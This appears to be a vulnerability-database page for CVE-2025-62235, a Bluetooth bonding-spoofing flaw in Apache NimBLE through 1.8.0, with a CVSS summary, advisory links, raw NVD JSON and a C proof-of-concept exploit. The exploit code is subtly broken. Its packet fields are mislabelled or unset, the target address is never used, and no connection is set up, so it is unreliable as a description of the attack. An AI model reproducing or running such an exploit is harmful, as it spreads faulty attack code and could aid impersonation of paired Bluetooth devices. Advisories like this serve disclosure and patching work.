Security Vulnerability Report
CVE-2025-62235 CVSS 8.1 HIGH

Published: 2026-01-10 10:15:51
Last Modified: 2026-01-14 17:45:58

Description

Authentication Bypass by Spoofing vulnerability in Apache NimBLE. Receiving a specially crafted Security Request could lead to removal of the original bond and re-bonding with an impostor. This issue affects Apache NimBLE through 1.8.0. Users are recommended to upgrade to version 1.9.0, which fixes the issue.

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:nimble:*:*:*:*:*:*:*:* - VULNERABLE
Apache NimBLE <= 1.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2025-62235 PoC - Apache NimBLE Authentication Bypass by Spoofing
// This PoC demonstrates the vulnerability in NimBLE's Security Request handling
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>   // uint8_t
#include <unistd.h>   // write()
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>

#define HCI_DEVICE 0
#define ATT_CID 4

// BLE PDU opcodes
#define BLE_PKT_TYPE_LL_SECURITY_REQ 0x0B

// Malicious Security Request packet structure
typedef struct {
    uint8_t opcode;   // LL_SECURITY_REQ = 0x0B
    uint8_t auth_req; // Authentication requirements
} __attribute__((packed)) security_req_pkt_t;

int create_hci_socket() {
    int sock = hci_open_dev(HCI_DEVICE);
    if (sock < 0) {
        perror("Failed to open HCI device");
        exit(1);
    }
    return sock;
}

void send_malicious_security_request(int sock, bdaddr_t *target_addr) {
    // Prepare malicious Security Request
    security_req_pkt_t sec_req = {
        .opcode = 0x0B,   // LL_SECURITY_REQ opcode
        .auth_req = 0x05  // Bonding requested
    };

    // Craft HCI ACL data packet
    uint8_t acl_packet[32];
    memset(acl_packet, 0, sizeof(acl_packet));

    // ACL header
    acl_packet[0] = 0x02; // ACL data packet
    acl_packet[1] = 0x00; // Handle low
    acl_packet[2] = 0x11; // Handle high (PB flag)

    // L2CAP header
    acl_packet[4] = 0x05; // Length low
    acl_packet[5] = 0x00; // Length high

    // ATT header
    acl_packet[6] = 0x06; // ATT Opcode: Security Request

    // Payload
    memcpy(&acl_packet[7], &sec_req, sizeof(sec_req));

    printf("[*] Sending malicious Security Request to target...\n");
    printf("[*] Opcode: 0x0B (LL_SECURITY_REQ)\n");
    printf("[*] AuthReq: 0x05 (Bonding)\n");

    // Send packet (requires raw HCI socket)
    if (write(sock, acl_packet, sizeof(acl_packet)) < 0) {
        perror("Failed to send packet");
    } else {
        printf("[+] Malicious Security Request sent!\n");
        printf("[*] This may trigger re-pairing if target is vulnerable\n");
    }
}

int main(int argc, char *argv[]) {
    if (argc != 2) {
        printf("Usage: %s <target_bdaddr>\n", argv[0]);
        printf("Example: %s 11:22:33:44:55:66\n", argv[0]);
        return 1;
    }

    int sock = create_hci_socket();
    bdaddr_t target_addr;
    str2ba(argv[1], &target_addr);

    printf("========================================\n");
    printf("CVE-2025-62235 PoC\n");
    printf("Apache NimBLE Auth Bypass by Spoofing\n");
    printf("========================================\n\n");

    send_malicious_security_request(sock, &target_addr);

    hci_close_dev(sock);
    return 0;
}

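References

https://github.com/apache/mynewt-nimble/commit/41f67e391e788c5feef9030026cc5cbc5431838a (Patch)
https://lists.apache.org/thread/rw2mrpfwb9d9wmq4h4b6ctcd6gpkk2ho (Mailing List, Vendor Advisory)
http://www.openwall.com/lists/oss-security/2026/01/08/4 (Mailing List, Third Party Advisory)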

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62235", "sourceIdentifier": "[email protected]", "published": "2026-01-10T10:15:50.820", "lastModified": "2026-01-14T17:45:58.133", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authentication Bypass by Spoofing vulnerability in Apache NimBLE.\n\nReceiving specially crafted Security Request could lead to removal of original bond and re-bond with impostor.\nThis issue affects Apache NimBLE: through 1.8.0.\n\nUsers are recommended to upgrade to version 1.9.0, which fixes the issue."}, {"lang": "es", "value": "Vulnerabilidad de omisión de autenticación por suplantación en Apache NimBLE.\n\nRecibir una solicitud de seguridad especialmente diseñada podría conducir a la eliminación del enlace original y a un nuevo enlace con un impostor.\nEste problema afecta a Apache NimBLE: hasta la versión 1.8.0.\n\nSe recomienda a los usuarios actualizar a la versión 1.9.0, que corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:nimble:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.9.0", "matchCriteriaId": "DC033019-AA62-465E-AD0A-8018D8C89ED3"}]}]}], "references": [{"url": "https://github.com/apache/mynewt-nimble/commit/41f67e391e788c5feef9030026cc5cbc5431838a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://lists.apache.org/thread/rw2mrpfwb9d9wmq4h4b6ctcd6gpkk2ho", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/08/4", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}